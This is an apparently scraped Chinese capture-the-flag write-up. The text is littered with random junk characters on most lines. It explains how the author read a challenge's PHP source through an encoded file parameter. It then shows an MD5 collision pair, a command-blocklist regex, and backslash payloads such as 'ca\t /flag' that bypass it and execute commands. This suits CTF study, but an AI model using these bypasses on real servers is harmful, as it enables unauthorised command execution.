|
|
* x: Z; e& h/ j ^) N+ C/ j
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>9 v6 I7 e4 e# I0 m
<p> </p>
% }+ ]; s/ V; c6 n+ T9 S- S+ A<p> </p>) m8 B' b- C, ~+ C
<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>
9 p) T @" E; |) L2 _# N<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
) x2 f8 y, A' X<p> </p>% t$ {, _6 M$ x U
<p> </p>
) M3 L, Y' X% s/ ~3 t<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>" u0 k0 S/ _$ ]+ h3 T
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>5 n$ D, |% N* ^5 O9 w0 z: H
<p>首先把那个进行一次base64位解码</p>0 r: j9 b' G! z4 J! S
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
+ N/ ?6 w% u% J7 i& ^" N<p> </p>5 ^+ _- |: E; n
<p> </p>
# m* d \5 V2 x; q, _6 d1 r<p> 解码一次以后还是很像base64编码,于是又解码一次</p>
4 v+ i- O& `, O<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>+ b v: ~8 u6 |( r! D& J' p
<p> </p>" d# O* o! e4 E0 y" B# T C" G
<p> </p>
w3 y' D$ Q$ K( B, ^4 q<p> 然后用hex解码一下得到了</p>* k4 m) ]$ ~; D
<div class="cnblogs_Highlighter">
1 `8 D# j& M$ c, w; N6 {<pre class="brush:sql;gutter:true;">555.png2 L- m) a8 z4 {2 u+ O8 ^2 k2 x9 m9 c
</pre>' ~; W/ w. Q! g8 l; ]( k
</div>9 e1 z( A. q0 c. A* t O& S
<p> 用同样的方法把index.php进行加密</p>- s) \7 y& E+ S* e- ]
<div class="cnblogs_Highlighter">
7 v+ Y* {2 ?+ o& @4 X<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 ?% G+ y0 Y6 H
</pre>! P- r2 @7 t5 I0 F8 h
</div>" v; z7 |. _% ]6 M/ t( I
<p> 然后输入到地址栏</p>5 Y; u1 d0 K& B, H& k8 r0 q6 R
<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>
! }/ J# T; x$ U5 _4 t. l<div class="cnblogs_code">) m2 W9 w4 n" k2 }6 a
<pre><?<span style="color: rgba(0, 0, 0, 1)">php& c8 o2 Z2 K$ x
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
" C4 H& O4 I1 J# z: g- g</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);* S6 n$ ]! E* |' _# f
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];7 X2 W7 E" A" b, q% ^
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) 8 K% o X, w0 g# x3 Q
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);
# x g# e. j3 n/ {</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));; U9 S! Y. ^- G5 _# L2 e, e3 C* Z
G b+ C; D$ K5 E R+ [
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
; p- T! D2 p; `) Y4 p</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {+ c, f4 o7 o$ z6 m- W% S5 f
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;
! x5 }8 f- t" K </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
. X9 w- i p# b L} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
4 j) j7 D2 Z0 v( s f! h0 D- U </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));7 Q5 p# s/ H6 I9 @1 r0 q0 s
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;
6 i" Q+ v5 k$ A4 Q: c5 k8 O( t( | </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">; w/ t- F4 e( I# h( [
}8 ]& b; V0 D7 y: C4 G
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
% I( S+ N8 c3 [/ u! x+ ]9 f, t</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;9 @( z/ g1 I1 m5 ^" l5 k. b/ j3 w
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
9 Y8 j( T6 m( D" S </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);, L% h4 b( n; J5 ~$ K2 U/ V' _( K
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
1 r( i, r9 m$ R' l2 d2 X$ n} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
7 E! _# H- ^5 z" \' Z# A% z+ y </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {- i% }+ `. J0 e7 B; ]6 }4 ^
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;* Q. I% k5 T: x. `
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {7 m7 O' [ z% p) F. r" _5 D( `
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
& I% ?) h# S1 \; L }
/ N) W4 t' z* y1 ~6 i* l; H}
% x# Z% ^3 e2 ^' m3 f) |
2 r7 s7 f2 n! Q4 _</span>?>
) q# g, N. z0 i& ~" k% `<html>
/ x$ l2 Z. V/ o! Y<style><span style="color: rgba(0, 0, 0, 1)">
2 g6 J1 P( u) j3 m body{
. W4 w, _' Q6 u D; V! ?3 e. v6 U background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
& e1 T& |8 @. V background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
1 P3 H7 X- i( l, M6 y background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;; x" {2 _- i2 |( i3 S, D4 x
background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
: N8 C; B4 t- m/ Y( i# _' ^<span style="color: rgba(0, 0, 0, 1)">}
( ]; Q' G- S: c% W7 ]</span></style>- w2 W8 Z6 y- G
<body>
+ H% r! K/ Q2 `" q% @$ A</body>8 I/ l. {7 c( Z; Z, f7 I( P! G
</html></pre>; s* n& i( I+ M; F5 \" G7 F2 k
</div>* v* @! U. o( B, @6 S
<p>结合前面的推断,关键代码就在</p>
# g, @, v# j: \; }<div class="cnblogs_code">5 i+ I0 P7 V+ A8 o7 _6 T, n4 y
<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
5 u* ^, ]8 W7 ?" \$ o </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;0 p! ~: h& P; X
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {& U" L+ N# Q. l% A6 t
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);$ B, ?! W. B6 E7 n% _
}</span></pre>
% j) M3 \! E0 K7 g1 H( M</div>
, c7 z& h! \- B9 C* n8 ]<p>这种MD5是md5强碰撞</p>) x! ? x0 l h1 O) K
<div class="cnblogs_Highlighter">* n5 J# ^- c& q3 D: q5 R
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2+ z$ t3 f& ^6 H/ j. o
</pre>
( J- z' |5 w' p6 K) Y' u</div>, Y3 a7 o2 X% Y& _: C* P
<div class="cnblogs_Highlighter">( w i8 \1 X9 X( ]
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
/ ^' Y) J+ S8 n- [' z6 W</pre>* L* a( {: M' a b9 P
</div>
# ~; v; X# W6 L. g) q' z2 M8 I<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>9 U4 n5 u: `' V/ v( [1 |! d9 t
<p>于是采用payload:</p>6 j% Y% C% d' K' M/ V5 [! G( Z7 B) H
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
8 J# O! B) R, X& ]' N# ~" @; c<p> </p>
1 W2 T9 c/ g4 W+ u+ d<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>
" N- Y3 Q2 J& r m* j4 ?<p>ls和l\s在命令执行的时候结果是一样的。</p>
3 i# R2 D( p5 d8 M& \<p>然后发现根目录里面有/flag</p>8 K. ]! {% Q, u5 O3 o- }0 p. r7 d
<p>于是payload:</p>
' P: W4 f6 S9 K3 P! \5 r1 {0 ~<div class="cnblogs_Highlighter">
& w: b0 i. q+ t5 N<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
5 x# Y+ g# K4 g m! o2 ^. A$ k& [</pre>
* K1 C, y, P$ @) j5 ^% k& j0 D' X3 c, J</div>4 _; X/ ~/ I, d- |! Z$ i
<p> 对于这个题目,因为他没有屏蔽sort和dir</p>6 J; k, B2 ~& X4 u/ |
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>0 t- X8 e0 H) j3 A
<p> </p>4 {3 R3 n, _! k
|
|
发表于 2022-2-12 14:35:42